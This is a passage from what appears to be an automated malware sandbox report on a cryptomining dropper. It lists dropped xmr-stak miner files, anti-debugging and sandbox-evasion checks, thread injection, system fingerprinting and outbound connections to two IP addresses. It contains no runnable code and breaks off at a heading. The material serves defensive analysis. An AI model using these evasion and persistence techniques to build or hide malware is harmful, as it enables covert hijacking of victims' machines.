Source: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\playersclub\LaunchServ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\playersclub\LaunchServ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\playersclub\LaunchServ.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Checks the free space of harddrives

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe

File Volume queried: C:\ FullSizeInformation

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Enumerates the file system

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\iaejSdZgD3.exe	Window / User API: threadDelayed 513			Jump to behavior
Source: C:\Windows\notepad.exe	Window / User API: threadDelayed 3199

Found dropped PE file which has not been started or loaded

Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libintl-8.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\Process.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\xmr-stak.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\xmrstak_opencl_backend.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\libcurl-4.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\player.exe	Jump to dropped file
Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\cudart64_80.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libeay32.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\paexec.exe	Jump to dropped file
Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\pthreadVC2.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libwinpthread-1.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\xmrstak_cuda_backend.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\libidn-11.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\xmrstak_cuda_backend.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\xmrstak_opencl_backend.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\libintl-8.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\zlib1.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libidn-11.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\libiconv-2.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\player.exe	Jump to dropped file
Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libcurl-4.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\ssleay32.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\libwinpthread-1.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\vcruntime140.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\paexec.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\zlib1.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\ssleay32.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\cudart64_80.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\runProcesses.exe	Jump to dropped file
Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\xmr-stak.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\libeay32.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\runProcesses.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\pthreadVC2.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\msvcp140.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libiconv-2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\Process.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Dropped PE file which has not been started: C:\ProgramData\playersclub\msvcr100.dll	Jump to dropped file

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Found evasive API chain checking for process token information

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe

API coverage: 1.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\iaejSdZgD3.exe TID: 2904	Thread sleep count: 513 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2704	Thread sleep time: -922337203685477s >= -60000s	Jump to behavior
Source: C:\Windows\notepad.exe TID: 452	Thread sleep count: 3199 > 30

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\notepad.exe

Last function: Thread delayed

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_004121A0 GetKeyboardLayout followed by cmp: cmp cl, 00000019h and CTI: ja 00412296h	6_2_004121A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00468360 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jne 004683CCh	6_2_00468360
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0043E430 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jne 0043E469h	6_2_0043E430
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0044AD20 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jne 0044AD66h	6_2_0044AD20
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0044AEE0 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jne 0044AF23h	6_2_0044AEE0

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\user\Desktop\iaejSdZgD3.exe	Code function: 0_2_0000000140004D08 wcslen,wcslen,RtlAllocateHeap,wcscpy,wcscat,wcscat,FindFirstFileW,GetLastError,HeapFree,	0_2_0000000140004D08
Source: C:\Users\user\Desktop\iaejSdZgD3.exe	Code function: 0_2_000000014000B758 FindFirstFileW,	0_2_000000014000B758
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE7B1A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	5_1_000000013FE7B1A8
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE9C630 FindFirstFileExA,	5_1_000000013FE9C630
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE8E830 SendDlgItemMessageW,GetDlgItem,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,FindClose,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,	5_1_000000013FE8E830
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00475350 FindFirstFileW,FindClose,GetFileAttributesW,	6_2_00475350
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_004753E0 _wcschr,_wcschr,_wcschr,_wcsncpy,_wcschr,FindClose,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose,	6_2_004753E0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00454140 GetFullPathNameW,GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,__wsplitpath,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,FindNextFileW,FindClose,	6_2_00454140
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00443150 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,__alldiv,	6_2_00443150
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00442290 _wcsncpy,_wcsrchr,_wcsrchr,FindFirstFileW,GetTickCount,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,GetTickCount,SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,__itow,	6_2_00442290
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00453350 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,CoInitialize,CoCreateInstance,CoUninitialize,	6_2_00453350
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_004424A7 GetTickCount,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,__itow,	6_2_004424A7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_004424A9 GetTickCount,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,__itow,	6_2_004424A9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_004548C0 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,	6_2_004548C0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_004429C0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,	6_2_004429C0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00442B40 _wcsncpy,SystemTimeToFileTime,GetLastError,LocalFileTimeToFileTime,GetSystemTimeAsFileTime,_wcsrchr,_wcsrchr,FindFirstFileW,GetLastError,SetFileTime,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,CreateFileW,GetLastError,SetFileTime,GetLastError,CloseHandle,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	6_2_00442B40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0042BC70 _wcsncpy,_wcsrchr,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,	6_2_0042BC70
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00470CF0 FindFirstFileW,FindClose,GetFileAttributesW,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle,	6_2_00470CF0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00441D00 SetLastError,DeleteFileW,GetLastError,FindFirstFileW,GetLastError,_wcsrchr,GetLastError,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,DeleteFileW,GetLastError,FindNextFileW,FindClose,	6_2_00441D00
Source: C:\ProgramData\playersclub\LaunchServ.exe	Code function: 12_2_00401A50 FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,	12_2_00401A50

Contains functionality to query system information

Source: C:\ProgramData\Win.exe

Code function: 5_1_000000013FE91580 VirtualQuery,GetSystemInfo,

5_1_000000013FE91580

Program exit points

Source: C:\ProgramData\Win.exe	API call chain: ExitProcess graph end node	graph_5-20042
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	API call chain: ExitProcess graph end node
Source: C:\ProgramData\playersclub\LaunchServ.exe	API call chain: ExitProcess graph end node

Queries a list of all running processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Anti Debugging:

Checks for debuggers (devices)

Source: C:\ProgramData\Win.exe	File opened: C:\Windows\WinSxS\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
Source: C:\ProgramData\Win.exe	File opened: C:\Windows\WinSxS\FileMaps\users_user_1_appdata_local_temp_rarsfx0_5b1a60acdb028280.cdf-ms

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System information queried: KernelDebuggerInformation

Checks if the current process is being debugged

Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe

Code function: 9_1_00ED2080 LdrGetProcedureAddress,VirtualAlloc,VirtualFree,

9_1_00ED2080

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\ProgramData\Win.exe

Code function: 5_1_000000013FE925E8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_1_000000013FE925E8

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\iaejSdZgD3.exe

Code function: 0_2_0000000140004B58 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

0_2_0000000140004B58

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Code function: 9_1_00ED2DD0 mov eax, dword ptr fs:[00000030h]		9_1_00ED2DD0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Code function: 9_1_00ED2D90 mov eax, dword ptr fs:[00000030h]		9_1_00ED2D90

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\ProgramData\Win.exe

Code function: 5_1_000000013FE9D6A0 GetProcessHeap,

5_1_000000013FE9D6A0

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Process token adjusted: Debug			Jump to behavior

Contains functionality to register its own exception handler

Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE9218C SetUnhandledExceptionFilter,_invalid_parameter_noinfo,	5_1_000000013FE9218C
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE927C0 SetUnhandledExceptionFilter,	5_1_000000013FE927C0
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FEA2E30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_1_000000013FEA2E30
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE925E8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_1_000000013FE925E8
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE99BE4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_1_000000013FE99BE4
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00496352 SetUnhandledExceptionFilter,	6_2_00496352
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00494096 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00494096
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_004919A5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_004919A5

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 46.30.215.96 80			Jump to behavior
Source: C:\Windows\notepad.exe	Network Connect: 104.207.130.172 80

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe

Thread register set: target process: 308

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe

Code function: CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle, explorer.exe

9_1_00ED7680

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe

6_2_0042EF10

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe

Code function: 6_2_004110C0 keybd_event,GetTickCount,GetForegroundWindow,GetWindowTextW,

6_2_004110C0

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe

Code function: 6_2_00410390 GetAsyncKeyState,GetSystemMetrics,GetSystemMetrics,GetCursorPos,WindowFromPoint,GetWindowThreadProcessId,SendMessageW,mouse_event,mouse_event,

6_2_00410390

May try to detect the Windows Explorer process (often used for injection)

Source: setup.exe, notepad.exe, 0000000A.00000000.14329055235.00000000008A0000.00000002.sdmp	Binary or memory string: Program Manager
Source: setup.exe, notepad.exe, 0000000A.00000000.14329055235.00000000008A0000.00000002.sdmp	Binary or memory string: Shell_TrayWnd
Source: notepad.exe, 0000000A.00000000.14329055235.00000000008A0000.00000002.sdmp	Binary or memory string: !Progman
Source: setup.exe, 00000006.00000001.14306303332.000000000049F000.00000002.sdmp, installer.exe, 0000000B.00000000.14321313278.000000000049F000.00000002.sdmp, systemSpawn.exe, 0000000F.00000000.14333161648.000000000049F000.00000002.sdmp, systemSpawn.exe.6.dr	Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidgroupclass%s%uProgram ManagerError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: setup.exe, 00000006.00000001.14306303332.000000000049F000.00000002.sdmp, installer.exe, 0000000B.00000000.14321313278.000000000049F000.00000002.sdmp, systemSpawn.exe, 0000000F.00000000.14333161648.000000000049F000.00000002.sdmp, systemSpawn.exe.6.dr	Binary or memory string: regk-hookm-hook2-hooksjoypollPART%i-%i(no)%s%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%uYYYYYWeekYearYDayWorkingDirWinDirWinDelayWDayUserNameTitleMatchModeSpeedTitleMatchModeTimeSinceThisHotkeyTimeSincePriorHotkeyTimeIdlePhysicalTimeIdleTickCountThisMenuItemPosThisMenuItemThisMenuThisLabelThisHotkeyThisFuncStoreCapslockModeStartupCommonStartupStartMenuCommonStartMenuSecScriptNameScriptHwndScriptFullPathScriptDirScreenWidthScreenHeightScreenDPIRegViewPtrSizeProgramsCommonProgramsPriorKeyPriorHotkeyOSVersionOSTypeNumBatchLinesNowUTCNowMyDocumentsMSecMouseDelayPlayMouseDelayMonMMMMMMMMMMinMDayLoopRegTypeLoopRegTimeModifiedLoopRegSubKeyLoopRegNameLoopRegKeyLoopReadLineLoopFileTimeModifiedLoopFileTimeCreatedLoopFileTimeAccessedLoopFileSi

Language, Device and Operating System Detection:

Contains functionality locales information (e.g. system language)

Source: C:\ProgramData\Win.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

5_1_000000013FE8D360

Contains functionality to query CPU information (cpuid)

Source: C:\ProgramData\Win.exe

Code function: 5_1_000000013FEA2610 cpuid

5_1_000000013FEA2610

Queries the installation date of Windows

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION InstallDate

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\Win.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\Win.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\run.bat VolumeInformation	Jump to behavior
Source: C:\ProgramData\Win.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\Win.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe VolumeInformation	Jump to behavior

Contains functionality to query local / system time

Source: C:\ProgramData\Win.exe

Code function: 5_1_000000013FE78E60 GetSystemTime,SystemTimeToFileTime,

5_1_000000013FE78E60

Contains functionality to query the account / user name

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe

Code function: 6_2_00444930 GetComputerNameW,GetUserNameW,

6_2_00444930

Contains functionality to query windows version

Source: C:\ProgramData\Win.exe

Code function: 5_1_000000013FE7B9A8 GetVersionExW,

5_1_000000013FE7B9A8

Queries the cryptographic machine GUID

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Cryptography MachineGuid

Stealing of Sensitive Information:

